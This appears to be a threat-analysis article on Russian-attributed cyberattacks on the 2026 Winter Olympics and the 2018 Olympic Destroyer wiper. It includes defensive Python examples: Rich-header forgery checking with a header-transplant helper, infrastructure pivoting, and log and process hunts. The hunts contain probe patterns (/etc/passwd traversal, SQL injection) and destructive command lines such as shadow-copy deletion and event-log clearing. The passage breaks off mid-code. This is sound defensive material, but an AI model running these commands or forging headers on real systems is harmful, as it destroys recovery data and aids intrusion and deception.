Italy Claims Russian-Origin Cyberattacks Targeting Winter Olympics: State-Sponsored Disruption Campaign

Just hours before the opening ceremony of the 2026 Winter Olympics in Milan and Cortina d'Ampezzo, Italy's Foreign Minister Antonio Tajani confirmed what cybersecurity experts had long anticipated: Russia was once again targeting the Olympic Games with cyberattacks. The announcement marks the latest chapter in a disturbing pattern of state-sponsored cyber aggression against international sporting events, echoing the devastating Olympic Destroyer attack that nearly derailed the 2018 Winter Games in PyeongChang, South Korea.

"We prevented a series of cyberattacks against foreign ministry sites, starting with Washington, and also involving some Winter Olympics sites, including hotels in Cortina," Tajani told reporters on February 4, 2026. "These are actions of Russian origin."

The admission raises critical questions about the persistent vulnerability of major international events to nation-state cyber operations and the geopolitical motivations driving these attacks. As organizations prepare for increasingly sophisticated threat actors, the 2026 Winter Olympics cyberattack campaign provides crucial lessons about the intersection of international politics, cyber warfare, and event security.

The 2026 Attack: Scope and Attribution

According to Italian authorities, approximately 120 websites and digital systems were targeted in a coordinated campaign that struck several groups of targets at once. The affected targets included:

  • Italian Foreign Ministry offices abroad, including the embassy in Washington, D.C., and consulates in Sydney, Toronto, and Paris
  • Olympic-related infrastructure, including hotels in Cortina d'Ampezzo where athletes were staying
  • Event management systems supporting the Games' digital operations

Despite the breadth of the campaign, Italian officials reported that the attacks were "effectively neutralized" before they caused significant disruption. Unlike the 2018 PyeongChang attack, which disabled Wi-Fi networks, television broadcasts, security gates, and the official Olympics app during the opening ceremony, Italy's defensive posture appears to have prevented any comparable operational failure.

The pro-Russian hacktivist group NoName057(16) claimed responsibility for the attacks on Telegram, describing the campaign as retaliation for Italy's support of Ukraine. "The Italian government's pro-Ukrainian policy means that support for Ukrainian terrorists is punished with our DDoS attacks," the group stated.

NoName057(16) emerged shortly after Russia's full-scale invasion of Ukraine in February 2022 and has focused primarily on distributed denial-of-service (DDoS) attacks against European nations supporting Kyiv, including Poland, Czechia, Lithuania, and Italy. The group crowdsources its attacks: volunteers run its DDoSia client, which fetches target lists from a loose network of command servers and floods the listed sites, producing attacks that are technically simple but disruptive.

However, the involvement of a hacktivist group claiming credit doesn't necessarily mean state-sponsored actors aren't involved. Russia has a well-documented history of using proxy groups and false flag operations to obfuscate attribution—a tactic that reached its apex during the 2018 PyeongChang Olympics attack.

The Geopolitical Context: Why Russia Targets the Olympics

To understand why Russia continues to target Olympic events, we must examine the complex relationship between the Kremlin, international sporting competitions, and national prestige.

Russia's Olympic Ban

Russia has been barred from competing as a nation in the 2026 Winter Games because of its war in Ukraine. After the 2022 invasion the International Olympic Committee (IOC) recommended that international federations exclude Russian and Belarusian athletes, and in October 2023 it suspended the Russian Olympic Committee outright. While 13 Russian athletes and 7 Belarusian athletes have been cleared to compete as neutrals, without national flags, anthems, or official recognition, the exclusion is a significant blow to Russian national pride.

This is not the first time Russia has faced Olympic sanctions. The country was previously banned from the 2018 Winter Olympics after investigators uncovered a state-run doping program that violated anti-doping regulations on a massive scale. Russian athletes were allowed to compete under the designation "Olympic Athletes from Russia" (OAR), but could not represent their country officially.

For decades, Russia has leveraged sporting events, especially the Olympics, for political gain. From the 1950s onward, the Soviet Union viewed the Games as an opportunity to demonstrate the superiority of socialism over capitalism, with the USSR-US rivalry pervading most major sporting events for three decades. The 2014 Winter Olympics in Sochi, which Russia hosted with enormous fanfare and expense, was intended as a showcase of Russian power and organizational capability on the world stage.

When that prestige is threatened through bans and sanctions, Russia has repeatedly responded with cyber operations.

Historical Precedent: The Fancy Bear WADA Breach

Russia's state-run doping program was exposed by the McLaren investigation in 2016, which led to restrictions on Russian athletes at the Rio Summer Games that year and, eventually, to the ban from PyeongChang in 2018. In September 2016 the GRU's Fancy Bear group (also known as APT28) breached the World Anti-Doping Agency (WADA) and leaked athletes' confidential medical records in an apparent attempt to undermine the credibility of the regulators investigating the Russian program.

By exposing that other countries' athletes had received therapeutic use exemptions (TUEs), which permit otherwise-banned substances for documented medical reasons, the operation sought to create a narrative of hypocrisy: Russia was being singled out while other nations' athletes received special treatment.

This pattern of retaliatory cyber operations against organizations that threaten Russian interests has become a hallmark of the Kremlin's approach to cyber conflict.

The PyeongChang Precedent: Olympic Destroyer's Devastating Impact

The 2018 Winter Olympics cyberattack remains one of the most sophisticated and deceptive hacking operations in history, serving as a crucial case study for understanding Russia's capabilities and tactics when targeting international sporting events.

The Attack Unfolds

On February 9, 2018, just minutes before the PyeongChang Winter Olympics opening ceremony began, a devastating cyberattack struck the Games' digital infrastructure. The malware, later dubbed Olympic Destroyer, systematically dismantled critical systems:

  • All nine domain controllers in the Seoul data centers were paralyzed, crippling the entire IT network
  • Wi-Fi networks throughout the stadium and 12 other Olympic facilities went offline
  • Thousands of internet-connected televisions displaying the ceremony went black
  • Every RFID-based security gate leading into Olympic buildings stopped functioning
  • The official Olympics app, including its digital ticketing system, ceased working
  • Automated ski gates and ski lifts at targeted resorts were temporarily disabled

Thousands of spectators found themselves unable to print tickets or access event information. For Sang-jin Oh, the director of technology for the PyeongChang Olympics organizing committee who had overseen the setup of more than 10,000 PCs, 20,000 mobile devices, 6,300 Wi-Fi routers, and 300 servers, the attack represented a nightmare scenario unfolding in real-time.

As fireworks exploded around the stadium and the opening ceremony proceeded, Oh and his team worked frantically to restore systems. They ultimately made the desperate decision to cut off the entire Olympic network from the internet to isolate the attackers and prevent further damage.

It took 12 hours of around-the-clock work to rebuild the Olympics' digital infrastructure from backups and restore normal operations. Amazingly, the next day's skating and ski jumping events proceeded with only minor hiccups, and most athletes and spectators remained unaware of how close the Games had come to technological catastrophe.

The False Flag Masterpiece

What made Olympic Destroyer truly unprecedented wasn't just its disruptive impact—it was the elaborate deception operation surrounding it.

The malware contained multiple layers of false flags designed to confuse forensic analysts:

  1. North Korean clues: The data-wiping component shared characteristics with malware used by the Lazarus hacking group, linked to North Korea. The code deleted files using the same distinctive technique—wiping just the first 4,096 bytes—that Lazarus had previously employed.
  2. Chinese fingerprints: Components of the password-stealing code matched exactly with tools used by APT3 and APT10, both groups reportedly linked to the Chinese government. Some of these code elements had never been seen in any other hacking operations.
  3. Russian similarities: The malware's overall structure resembled previous Russian cyberattacks like NotPetya and Bad Rabbit, using similar password-stealing tools and remote access techniques.
  4. Forged metadata: Perhaps most sophisticated, the malware's file metadata was deliberately falsified to point toward North Korean authorship. The forged element was the so-called Rich header, an undocumented block that Microsoft's linker writes into every executable it builds, recording which compiler and linker versions produced it; in the Olympic Destroyer wiper that header was identical to the one in a known Lazarus sample. Kaspersky researcher Igor Soumenkov showed that it could not be genuine: the toolchain the header claimed could not have produced the rest of the binary, so the header had been copied in rather than generated by the linker.

This level of deception represented "psychological warfare on reverse-engineers," according to Silas Cutler, a security researcher at CrowdStrike. The goal wasn't to point at a single false culprit but to create epistemological chaos, making analysts doubt every conclusion they reached.
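To see what a forged header looks like to an analyst, here is an added worked example (not code from the article, from Kaspersky, or from any of the vendors cited) that parses a PE Rich header, recomputes the checksum that the linker stores as the header's XOR key, and reports whether the stored key matches the file it sits in. The checksum reconstruction follows the publicly documented reverse-engineered algorithm; the sample executables, DOS stubs, product ids and the transplant helper are all constructed here for illustration. Note that this checksum is a weaker test than the toolchain analysis Kaspersky actually published: it catches a Rich header that was edited or moved onto a file with a different DOS stub, but a header copied wholesale between two binaries that share Microsoft's standard stub can still validate, which the last sample below shows.

```python
"""Parse a PE Rich header and check whether its checksum matches the file it sits in.

Added example for this article; not code from the page, from Kaspersky, or from
any vendor it cites. The Rich header is the undocumented block Microsoft's linker
writes between the DOS stub and the PE header, listing the compiler/linker builds
that produced the object files. The XOR key masking it doubles as a checksum over
the DOS header, the stub and the entries; the reconstruction below follows the
published reverse-engineered algorithm. All sample bytes and tool ids are constructed.
"""
import struct

DANS = 0x536E6144  # "DanS" read as a little-endian dword
MASK = 0xFFFFFFFF


def rol32(value: int, count: int) -> int:
    """Rotate a 32-bit value left; the count is reduced mod 32 as x86 ROL does."""
    count &= 31
    value &= MASK
    return ((value << count) | (value >> (32 - count))) & MASK


def parse_rich_header(data: bytes):
    """Return (dans_offset, key, [(comp_id, use_count), ...]) or None if absent."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    rich_pos = data.rfind(b"Rich", 0x40, e_lfanew)
    if rich_pos < 0:
        return None
    key = struct.unpack_from("<I", data, rich_pos + 4)[0]
    # Scan for the masked "DanS" marker followed by three masked zero dwords.
    for dans in range(0x40, rich_pos - 15, 4):
        words = struct.unpack_from("<IIII", data, dans)
        if words[0] ^ key == DANS and all(w ^ key == 0 for w in words[1:]):
            break
    else:
        return None
    entries = []
    for pos in range(dans + 16, rich_pos, 8):
        comp_id, count = struct.unpack_from("<II", data, pos)
        entries.append((comp_id ^ key, count ^ key))
    return dans, key, entries


def rich_checksum(data: bytes, dans: int, entries) -> int:
    """Recompute the linker checksum that doubles as the XOR key."""
    checksum = dans
    for i in range(dans):
        if 0x3C <= i < 0x40:  # e_lfanew is patched in after the checksum is taken
            continue
        checksum = (checksum + rol32(data[i], i)) & MASK
    for comp_id, count in entries:
        checksum = (checksum + rol32(comp_id, count)) & MASK
    return checksum


def rich_header_is_consistent(data: bytes) -> bool:
    """True when the stored key equals the checksum over this file's own bytes."""
    parsed = parse_rich_header(data)
    if parsed is None:
        return False
    dans, key, entries = parsed
    return rich_checksum(data, dans, entries) == key


def describe_entries(entries):
    """Split each comp_id into (product_id, build_number, use_count) for reporting."""
    return [(comp_id >> 16, comp_id & 0xFFFF, count) for comp_id, count in entries]


def build_sample(dos_stub: bytes, entries) -> bytes:
    """Construct a minimal DOS header + stub + Rich header + PE signature (test data only)."""
    head = bytearray(0x40)
    head[0:2] = b"MZ"
    head += dos_stub
    head += b"\0" * (-len(head) % 4)  # keep the Rich header dword-aligned
    dans = len(head)
    key = rich_checksum(bytes(head), dans, entries)
    rich = struct.pack("<IIII", DANS ^ key, key, key, key)
    for comp_id, count in entries:
        rich += struct.pack("<II", comp_id ^ key, count ^ key)
    rich += b"Rich" + struct.pack("<I", key)
    blob = head + rich
    struct.pack_into("<I", blob, 0x3C, len(blob))  # e_lfanew points at "PE\0\0"
    return bytes(blob + b"PE\0\0")


def transplant_rich_header(victim: bytes, donor: bytes) -> bytes:
    """Copy the donor's whole Rich header, key included, over the victim's, as a false flag would."""
    v_dans = parse_rich_header(victim)[0]
    d_dans = parse_rich_header(donor)[0]
    v_lfanew = struct.unpack_from("<I", victim, 0x3C)[0]
    d_lfanew = struct.unpack_from("<I", donor, 0x3C)[0]
    out = bytearray(victim[:v_dans] + donor[d_dans:d_lfanew] + victim[v_lfanew:])
    struct.pack_into("<I", out, 0x3C, v_dans + (d_lfanew - d_dans))
    return bytes(out)


# Constructed stubs and tool ids (product id << 16 | build); the values are illustrative.
STANDARD_STUB = b"This program cannot be run in DOS mode.\r\n$"
CUSTOM_STUB = b"Built with a different toolchain and stub.\r\n$"
TOOLS_A = [(0x00010000, 1), (0x00930000 | 0x25E1, 40), (0x00940000 | 0x25E1, 3)]
TOOLS_B = [(0x00010000, 2), (0x00060000 | 0x2064, 12), (0x00090000 | 0x2064, 1)]

GENUINE = build_sample(STANDARD_STUB, TOOLS_A)          # checksum matches
DONOR = build_sample(CUSTOM_STUB, TOOLS_B)              # checksum matches
FORGED = transplant_rich_header(GENUINE, DONOR)         # donor header on a different stub: mismatch
SAME_STUB_FORGERY = transplant_rich_header(GENUINE, build_sample(STANDARD_STUB, TOOLS_B))
```

Run against a real sample, `describe_entries` gives the product and build numbers that a toolchain table maps to compiler and linker versions; that mapping, compared with what the binary's code and imports imply, is the check that actually caught Olympic Destroyer. The checksum is the cheap first filter, and `SAME_STUB_FORGERY` validating as consistent is the reminder of its limit.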

Attribution Through Infrastructure

While the code-level deceptions were sophisticated, researchers eventually identified the true perpetrators through patient infrastructure analysis.

FireEye researcher Michael Matonis took a different approach, examining not the malware's code but the infrastructure used to deliver it. By tracing IP addresses, domain names, and command-and-control servers over weeks of investigation, he discovered connections to:

  • Previous attacks targeting Ukrainian LGBT activist groups and government agencies
  • The broader Russian cyber campaign against Ukraine that included power grid attacks
  • The 2016 breach of Arizona and Illinois state election boards
  • Domain spoofing operations that impersonated a Florida-based voting technology company

The trail led definitively to Russia's military intelligence agency, the GRU, and specifically to GRU Unit 74455, operating out of a building in Khimki, just outside Moscow—the same unit behind the NotPetya attack that caused $10 billion in global damage and the broader election interference campaign against the United States.

Official confirmation came in two U.S. Justice Department indictments. The July 2018 indictment of 12 GRU officers for interference in the 2016 U.S. election named Unit 74455 and its member Anatoliy Sergeyevich Kovalev; the October 2020 indictment of six Unit 74455 officers, Kovalev among them, explicitly charged them with the Olympic Destroyer attack, alongside NotPetya and the Ukrainian grid attacks, confirming what researchers had painstakingly uncovered.
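The pivoting Matonis did can be reproduced mechanically on any set of enrichment records. The following added example (not FireEye's or Mandiant's code, and not the real indicators from that investigation) builds a bipartite graph of indicators and the infrastructure attributes they share, finds the shortest pivot chain between two indicators, and lists which campaign labels end up in one cluster. All records are constructed, using reserved example domains and RFC 5737 documentation addresses. The design point a practitioner needs is the strong/weak split: a shared IP or registrant identity is controlled by the operator and is evidence, whereas a shared nameserver at a bulk hosting provider links thousands of unrelated tenants and, if treated as evidence, drags unrelated domains into the cluster.

```python
"""Pivot across shared infrastructure to link indicators from different campaigns.

Added example for this article, not code from FireEye/Mandiant or any source it
cites, and not the data from that investigation. All records are constructed:
reserved example domains and RFC 5737 documentation addresses.
"""
from collections import defaultdict, deque

# (campaign, indicator, attribute_type, attribute_value): constructed passive-DNS/WHOIS-style data
RECORDS = [
    ("olympic-lure", "olympic-ticket-portal.example", "a_record", "198.51.100.23"),
    ("olympic-lure", "olympic-ticket-portal.example", "registrant", "reg-7f3a@mail.example"),
    ("olympic-lure", "olympic-ticket-portal.example", "ns", "ns1.bulkhoster.example"),
    ("olympic-lure", "games-schedule-update.example", "a_record", "198.51.100.23"),
    ("olympic-lure", "games-schedule-update.example", "registrant", "reg-7f3a@mail.example"),
    ("ukraine-2016", "activist-forum-login.example", "a_record", "192.0.2.77"),
    ("ukraine-2016", "activist-forum-login.example", "registrant", "reg-7f3a@mail.example"),
    ("ukraine-2016", "activist-forum-login.example", "ns", "ns1.bulkhoster.example"),
    ("election-2016", "vendor-support-portal.example", "a_record", "192.0.2.77"),
    ("election-2016", "vendor-support-portal.example", "ns", "ns2.bulkhoster.example"),
    ("unrelated", "cdn-assets.example", "a_record", "203.0.113.9"),
    ("unrelated", "cdn-assets.example", "ns", "ns1.bulkhoster.example"),
]

# Attributes an operator controls versus ones shared by thousands of hosting tenants.
STRONG = {"a_record", "registrant"}


def build_graph(records, strong_only=True):
    """Bipartite graph: ("indicator", name) nodes <-> (attribute_type, value) nodes."""
    graph = defaultdict(set)
    for _, indicator, kind, value in records:
        if strong_only and kind not in STRONG:
            continue
        ind_node, attr_node = ("indicator", indicator), (kind, value)
        graph[ind_node].add(attr_node)
        graph[attr_node].add(ind_node)
    return graph


def pivot_path(graph, src, dst):
    """Shortest chain of shared attributes from one indicator to another (BFS), or None."""
    start, goal = ("indicator", src), ("indicator", dst)
    if start not in graph or goal not in graph:
        return None
    parents = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while node is not None:
                path.append(node)
                node = parents[node]
            return path[::-1]
        for nxt in sorted(graph[node]):
            if nxt not in parents:
                parents[nxt] = node
                queue.append(nxt)
    return None


def clusters(graph):
    """Connected components, each reported as the sorted list of indicators it contains."""
    seen, out = set(), []
    for node in sorted(graph):
        if node in seen:
            continue
        comp, stack = set(), [node]
        while stack:
            cur = stack.pop()
            if cur in seen:
                continue
            seen.add(cur)
            if cur[0] == "indicator":
                comp.add(cur[1])
            stack.extend(graph[cur])
        out.append(sorted(comp))
    return sorted(out)


def campaigns_linked(records, strong_only=True):
    """Campaign labels spanned by each cluster; a cluster spanning several labels is a pivot."""
    label = {ind: camp for camp, ind, _, _ in records}
    return [sorted({label[i] for i in comp}) for comp in clusters(build_graph(records, strong_only))]
```

With strong links only, the Olympic lure domains connect to the 2016 Ukraine and election infrastructure through a shared registrant and a shared address, while `cdn-assets.example` stays alone; allow the nameserver link and it joins the cluster, which is exactly the false positive that makes shared-NS pivots unsafe without corroboration.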

The Sandworm Connection

Olympic Destroyer is the work of Sandworm (also tracked as APT44), the GRU Unit 74455 team that ranks among the most dangerous Russian hacking groups; researchers reached that conclusion from the infrastructure evidence, and the 2020 indictment confirmed it.

Sandworm had previously conducted a relentless cyber campaign against Ukraine, including:

  • Two unprecedented attacks on Ukrainian power utilities in 2015 and 2016, causing blackouts for hundreds of thousands
  • The NotPetya worm in 2017, the most costly cyberattack in history
  • Repeated data-destroying intrusions against Ukrainian companies, government agencies, railways, and airports

The group's willingness to cause physical disruption and accept massive collateral damage—NotPetya spread far beyond Ukraine to cripple global shipping companies, pharmaceutical manufacturers, and countless other organizations—marked it as an exceptionally reckless actor willing to cross lines other nation-state groups avoided.

Italy's Defensive Posture: Lessons Learned

The relative success of Italy's defensive operations against the 2026 Olympics cyberattack campaign suggests that lessons from PyeongChang have been internalized.

Preparation and Planning

The PyeongChang organizing committee had conducted extensive preparation, including:

  • 20 cybersecurity advisory group meetings since 2015
  • Disaster simulation drills as early as summer 2017
  • Exercises covering cyberattacks, fires, and earthquakes

Despite this preparation, the actual attack still overwhelmed their systems. The difference in 2026 appears to be that Italian authorities anticipated the specific threat of Russian-origin attacks and established monitoring and response capabilities before the threat materialized.

Early Detection and Rapid Response

Italian officials said the attacks on roughly 120 sites were neutralized, which indicates the targets were being watched and the response was rehearsed. For a DDoS campaign of the kind NoName057(16) claimed, "neutralized" most plausibly means the floods were absorbed or filtered (upstream scrubbing, rate limiting and blocking of the attacking sources) before the sites went down. Tajani's statement did not describe the techniques used, so whether defenders also had to evict intruders from any of those systems is not public. Either way, the threat was identified and contained well before a critical moment such as the opening ceremony, rather than discovered during it, as in PyeongChang.

This represents a maturation of Olympic cybersecurity from reactive to proactive posture.

International Cooperation

Foreign Minister Tajani's statement specifically mentioned attacks on Italian diplomatic facilities abroad, including in Washington, D.C. Defending sites hosted in several countries at once implies coordination between Italy's national cybersecurity agency (ACN), the Foreign Ministry's own IT teams, and the hosting providers and national CSIRTs in those countries, and very likely threat-intelligence sharing with allied agencies.

Tajani did not say which partners were involved; NATO and European Union cyber defence bodies and bilateral partners such as the United States are the obvious candidates. Italy is not a member of the Five Eyes alliance (U.S., UK, Canada, Australia, and New Zealand), so any Five Eyes contribution would have come through bilateral channels and has not been confirmed.

The Hacktivist Front: NoName057(16) and Russian Proxies

The claim of responsibility by NoName057(16) fits a pattern of Russian operations utilizing ostensibly independent hacktivist groups to provide plausible deniability while advancing state interests.

The Hacktivist Model

Pro-Russian hacktivist groups emerged prominently after the 2022 invasion of Ukraine, conducting DDoS attacks and low-level disruptions against nations supporting Kyiv. Groups like NoName057(16), Killnet, and Anonymous Russia operate in a grey zone—they may genuinely consist of nationalist volunteers, but they often advance objectives that align perfectly with Russian state interests.

This creates attribution ambiguity: Are these truly independent hacktivists, or are they coordinated (or at least tolerated) by Russian intelligence services as a form of cyber militia?

DDoS vs. Sophisticated Intrusions

NoName057(16)'s typical modus operandi involves distributed denial-of-service attacks—flooding targets with traffic to make websites and services unavailable. These attacks are relatively simple to execute and difficult to prevent entirely, though their impact is generally limited to temporary disruption.

Tajani's statement did not describe the attack techniques, and the only public claim of responsibility is for DDoS. The target set, diplomatic missions on several continents together with Olympic sites, was nonetheless coordinated, and the public record does not rule out more capable actors operating under hacktivist cover, as happened in 2018. Whether NoName057(16) acted alone can only be settled by evidence from the targeted systems, not by a Telegram post.

The PyeongChang precedent suggests we should be skeptical of surface-level attribution claims and examine deeper infrastructure and capability indicators.
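Whether a campaign was a flood or something more is answered by the targets' own telemetry, not by the claim on Telegram. The added example below (not from the article or any vendor it cites) runs over constructed Combined Log Format access-log lines for a fictional ticketing site and separates the two signals: per-source and per-path request rates that indicate a volumetric HTTP flood, and request paths that indicate someone testing for weaknesses. The thresholds and the probe patterns are assumptions to be tuned per site; the addresses are RFC 5737 documentation ranges.

```python
"""Separate a volumetric HTTP flood from vulnerability probing in the same access log.

Added example for this article; not code from the page or from any vendor it cites.
Log lines are constructed in Combined Log Format with RFC 5737 addresses, and the
thresholds and probe patterns are assumptions to tune per site, not published figures.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\d+|-)"
)
# Paths that indicate someone testing for weaknesses rather than just piling on load.
PROBE_PATTERNS = [re.compile(p) for p in (
    r"\.\./", r"/etc/passwd", r"(?i)union\s+select", r"/\.env\b", r"/wp-login\.php", r"(?i)xp_cmdshell")]


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "src": m["src"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def analyze(lines, window_s=10, src_rps=5.0, path_rps=20.0, min_sources=3):
    """Bucket requests into fixed windows; report flood sources, flooded paths and probing sources."""
    events = [e for e in map(parse_line, lines) if e]
    result = {"flood_sources": [], "flooded_paths": [], "probe_sources": {}}
    if not events:
        return result
    t0 = min(e["ts"] for e in events)
    per_src = defaultdict(Counter)                      # window -> source -> requests
    per_path = defaultdict(Counter)                     # window -> path -> requests
    path_srcs = defaultdict(lambda: defaultdict(set))   # window -> path -> distinct sources
    probes = defaultdict(set)                           # source -> suspicious paths
    for e in events:
        w = int((e["ts"] - t0).total_seconds() // window_s)
        per_src[w][e["src"]] += 1
        per_path[w][e["path"]] += 1
        path_srcs[w][e["path"]].add(e["src"])
        if any(p.search(e["path"]) for p in PROBE_PATTERNS):
            probes[e["src"]].add(e["path"])
    flood = {s for w in per_src for s, n in per_src[w].items() if n / window_s >= src_rps}
    # A path counts as flooded only when the load is distributed across several sources.
    paths = {p for w in per_path for p, n in per_path[w].items()
             if n / window_s >= path_rps and len(path_srcs[w][p]) >= min_sources}
    result["flood_sources"] = sorted(flood)
    result["flooded_paths"] = sorted(paths)
    result["probe_sources"] = {s: sorted(v) for s, v in probes.items()}
    return result


def make_sample_log():
    """Constructed traffic: a small volunteer-style flood, normal visitors, and one scanner."""
    base = datetime(2026, 2, 4, 18, 0, 0, tzinfo=timezone.utc)

    def line(src, offset_s, path, status=200):
        ts = (base + timedelta(seconds=offset_s)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{src} - - [{ts}] "GET {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'

    lines = []
    for i in range(5):                       # five sources, 60 requests each inside 10 s
        for k in range(60):
            lines.append(line(f"192.0.2.{10 + i}", k / 6, "/it/biglietti/cerimonia", 503))
    lines.append(line("198.51.100.5", 3, "/it/programma"))
    lines.append(line("198.51.100.6", 7, "/en/venues/cortina"))
    for k, p in enumerate(["/wp-login.php", "/.env", "/index.php?page=../../etc/passwd"]):
        lines.append(line("203.0.113.44", 2 + k, p, 404))    # low volume, hostile intent
    return lines
```

The flood sources and the flooded path are what a DDoS claim predicts; the probing source is the one to investigate, because it is looking for a way in rather than a way to knock the site over. A real deployment would read logs from the edge (CDN or load balancer) rather than the origin, since a successful flood never reaches the origin's log.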

The Broader Pattern: Russia's Cyber Campaign Against International Sports

The 2026 Winter Olympics attack is not an isolated incident but part of a sustained pattern of Russian cyber aggression against international sporting events.

Paris 2024 Summer Olympics

During the 2024 Summer Olympics in Paris, French authorities and cybersecurity researchers reported increased cyber and disinformation activity originating from Russia. While these operations did not achieve the disruptive impact of PyeongChang, they demonstrated continued interest in undermining events where Russian participation was restricted.

Tokyo 2020 Olympics

In October 2020, the UK's National Cyber Security Centre (NCSC) disclosed that GRU Unit 74455, the Sandworm group behind Olympic Destroyer, had conducted cyber reconnaissance against the organizers, logistics services and sponsors of the Tokyo 2020 Olympics (eventually held in 2021 because of the COVID-19 pandemic) before the Games were postponed.

The Pattern of Retaliation

Each of these attacks follows Russian exclusion or limitation from Olympic competition:

  • 2016: WADA breach follows doping investigation
  • 2018: Olympic Destroyer follows Russian ban from PyeongChang
  • 2020: Tokyo 2020 organizers and partners probed by GRU reconnaissance while Russian restrictions continued
  • 2024: Paris Olympics face disinformation during ongoing Ukraine war
  • 2026: Milan-Cortina targeted as Russian ban continues

The pattern suggests that Olympic cyberattacks function as a form of asymmetric retaliation—Russia cannot compete openly, so it seeks to undermine the events themselves.

Strategic Implications for Cybersecurity Professionals

The 2026 Winter Olympics cyberattack campaign offers several critical lessons for security professionals defending high-profile events and critical infrastructure.

1. Anticipate Geopolitical Motivations

Major international events become targets not because of their technical vulnerabilities but because of their symbolic and political significance. Threat modeling must account for adversaries with nation-state capabilities and strong motivations to disrupt operations.

Organizations hosting or supporting high-profile events should conduct thorough geopolitical analysis to identify potential threat actors and their motivations. In this case, Russia's exclusion from the Olympics created a predictable incentive structure for cyber operations.

2. Defense in Depth for Event Infrastructure

The PyeongChang attack succeeded in part because disabling domain controllers created a cascading failure across the entire IT infrastructure. Modern event security architectures should include:

  • Segmentation: Isolate critical systems so compromise of one doesn't cascade
  • Redundancy: Maintain backup systems that can quickly assume primary roles
  • Offline backups: Ensure recovery capabilities exist even if network infrastructure is compromised
  • Manual fallbacks: Design processes that can function without digital systems during crisis response

3. Expect Deception and False Flags

Nation-state actors investing in high-profile operations will also invest in sophisticated attribution evasion. Security teams should:

  • Look beyond code-level indicators to infrastructure patterns
  • Analyze long-term campaigns rather than isolated incidents
  • Share intelligence with peer organizations and government agencies
  • Maintain healthy skepticism about initial attribution claims, even from reputable sources

4. Pre-Event Threat Hunting

Italy's success in neutralizing the 2026 attacks suggests they had established monitoring and threat hunting capabilities before the Games began. Organizations should:

  • Deploy enhanced monitoring weeks or months before high-risk events
  • Hunt proactively for indicators of compromise rather than waiting for alerts
  • Establish 24/7 security operations coverage during critical windows
  • Conduct tabletop exercises and simulations specific to anticipated threat scenarios
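What hunting proactively means in practice is easier to show than to list. The added example below (not the article's code, nor Cisco Talos') runs two hunts over constructed process-creation events of the kind Sysmon or Windows event 4688 produce. Talos' published analysis of Olympic Destroyer documented it deleting shadow copies with vssadmin, deleting the backup catalog with wbadmin, disabling Windows recovery with bcdedit, and clearing event logs with wevtutil before wiping, and spreading with PsExec and WMI; the first hunt looks for that generic destructive preamble, the second for one host fanning out remote execution to many. Hostnames, users, timings, the event field names and the thresholds are all assumptions.

```python
"""Hunt process-creation telemetry for pre-wipe recovery tampering and remote-execution fan-out.

Added example for this article; not code from the page, Cisco Talos, or any product.
The command patterns are the generic destructive preamble Talos documented for
Olympic Destroyer (vssadmin/wbadmin/bcdedit/wevtutil) plus PsExec/WMI spreading.
Hostnames, users, timings, field names and thresholds are constructed assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One of these alone is often routine; several on one host within minutes is not.
TAMPER_RULES = {
    "shadow_copies_deleted": re.compile(r"(?i)\bvssadmin(?:\.exe)?\s+delete\s+shadows"),
    "backup_catalog_deleted": re.compile(r"(?i)\bwbadmin(?:\.exe)?\s+delete\s+catalog"),
    "recovery_disabled": re.compile(
        r"(?i)\bbcdedit(?:\.exe)?\b.*(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    "event_logs_cleared": re.compile(r"(?i)\bwevtutil(?:\.exe)?\s+cl\s+\S+"),
}
REMOTE_EXEC = re.compile(
    r'(?i)(?:\bwmic(?:\.exe)?\s+/node:"?(?P<wmic>[\w.\-]+)|\bpsexec(?:\.exe)?\s+\\\\(?P<psexec>[\w.\-]+))'
)


def tampering_categories(cmdline):
    """Which recovery-tampering categories a command line matches."""
    return sorted(name for name, rx in TAMPER_RULES.items() if rx.search(cmdline))


def remote_target(cmdline):
    """Hostname targeted by a WMI or PsExec remote execution, or None."""
    m = REMOTE_EXEC.search(cmdline)
    return (m["wmic"] or m["psexec"]) if m else None


def _by_host(events):
    groups = defaultdict(list)
    for e in events:
        groups[e["host"]].append(e)
    for evs in groups.values():
        evs.sort(key=lambda e: e["ts"])
    return groups


def find_recovery_tampering(events, window_min=15, min_categories=2):
    """Hosts on which >= min_categories distinct tampering actions occur inside one window."""
    hits = {}
    for host, evs in _by_host(events).items():
        tagged = [(e["ts"], c) for e in evs for c in tampering_categories(e["cmdline"])]
        for i, (start, _) in enumerate(tagged):
            cats = {c for ts, c in tagged[i:] if ts - start <= timedelta(minutes=window_min)}
            if len(cats) >= min_categories:
                hits[host] = sorted(cats | set(hits.get(host, [])))
    return hits


def find_remote_exec_fanout(events, window_min=15, min_targets=3):
    """Hosts that launch remote execution against >= min_targets distinct machines inside one window."""
    hits = {}
    for host, evs in _by_host(events).items():
        tagged = [(e["ts"], t) for e in evs if (t := remote_target(e["cmdline"]))]
        for i, (start, _) in enumerate(tagged):
            targets = {t for ts, t in tagged[i:] if ts - start <= timedelta(minutes=window_min)}
            if len(targets) >= min_targets:
                hits[host] = sorted(targets | set(hits.get(host, [])))
    return hits


def make_sample_events():
    """Constructed process-creation events for one night on a fictional Games network."""
    t0 = datetime(2026, 1, 30, 2, 14)

    def ev(host, minutes, cmdline, user="NT AUTHORITY\\SYSTEM"):
        return {"ts": t0 + timedelta(minutes=minutes), "host": host, "user": user, "cmdline": cmdline}

    events = [
        ev("BKP-SRV01", 0, "vssadmin delete shadows /for=D: /oldest", "GAMES\\svc_backup"),  # routine rotation
        ev("WS-0417", 10, "vssadmin.exe delete shadows /all /quiet"),
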